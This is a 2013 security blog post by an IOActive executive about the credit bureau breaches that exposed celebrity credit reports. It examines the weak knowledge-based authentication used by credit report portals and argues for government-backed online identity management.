[4] http://www.youtube.com/user/EuroSecurytec
INSIGHTS | March 14, 2013

Credit Bureau Data Breaches

This week saw considerable surprise over how easy it is to acquire personal credit report information. On Tuesday, Bloomberg News led with the story “Top Credit Agencies Say Hackers Stole Celebrity Reports”, and yesterday there were many follow-up stories examining the hack. In one story I spoke with Rob Westervelt over at CRN regarding the problems credit reporting agencies face when authenticating the person to whom the credit information applies, and the additional problems they face securing the data in general (you can read the article “Equifax, Other Credit Bureaus Acknowledge Data Breach”).

 

Many stories have focused on one of two areas – the celebrities, or the ease of acquiring credit reports – but I wanted to touch upon some of the problems credit monitoring agencies face in verifying who has access to the data, and how that fits into the bigger problem of Internet-based authentication and the prevalence of personal-enough information.
The repeated failure of Internet portals tasked with providing access to personal credit report information stems from two things: the data they have available for authentication, and the legislated requirement to make the data available in the first place.
Credit monitoring agencies are required to make the data accessible to all the individuals they hold reports on; however, access to the credit report information is achieved through a wide variety of free and subscription portals – most of which are not associated with the credit monitoring bureaus in the first place.
In order to provide access to a particular individual’s credit report, the user must answer a few questions about themselves via one such portal. These questions, by necessity, are restricted to the kinds of data held (and tracked) by the credit reporting agencies – based on information garnered from other financial institutions. This information includes name, date of birth (or age), social security number, account numbers, account balances, account addresses, financial institutions that manage the accounts, and past requests for access to credit report information. While it sounds like a lot of information, it’s actually not a very rich source for authentication purposes – especially when some of the most important information that can uniquely identify the individual is relatively easy to acquire through other external and Internet-based sources.
Time Magazine’s article “Hackers Now Aiming For Your Credit Reports” from a year ago describes many of these limitations and where some of this information can be acquired. In essence though, the data is easy to mine from social media sites and household tax records, and a little brute-force guessing can overcome the hurdle of it not already being in the public domain.
The question then becomes “what can the credit monitoring agencies do to protect the privacy of credit reports?” Some commentators have recommended that individuals should provide a copy of state-issued identification documents – such as a driver’s license or passport.
The submission of such a scanned document poses new problems for the credit monitoring agencies. First of all, this probably isn’t automatable on a large scale, and they’ll need trained staff to review each of these documents. Secondly, there are plenty of tools and websites that allow you to generate a fake ID within seconds – and spotting the fakes will be extremely difficult without tying the authentication process to an external government authentication system (e.g. checking to see if the driver’s license or passport number is legitimate). Thirdly, do you want the credit reporting agencies holding even more personal information about you?
This entire problem is getting worse – not just for the credit monitoring agencies, but for all online services. Authentication – especially “first time” authentication – is difficult at the best of times, but if you’re trying to do it using only data an organization has collected and holds itself, it’s nigh on impossible given current hacking techniques.
I hate to say it, but there’s a very strong (and growing) requirement for governments to play a larger role in identity management. Someone somewhere needs to act as a trusted Internet passport authority – with “trusted” being the critical piece. I’ve seen the arguments that have been made for Facebook, Google, etc. being that identity management platform, but I respectfully disagree. These commercial services aren’t identity management platforms; they’re authentication gateways. What is needed is the cyber-equivalent of a government-issued passport, with all the checks and balances that entails.
Even that is not perfect, but it would certainly be better than the crummy vendor-specific authentication systems and password recovery processes that currently plague the Internet.
In the meantime, don’t be surprised if you find your credit report and other personal information splattered over the Internet as part of some juvenile doxing attack.
— Gunter Ollmann, CTO IOActive Inc.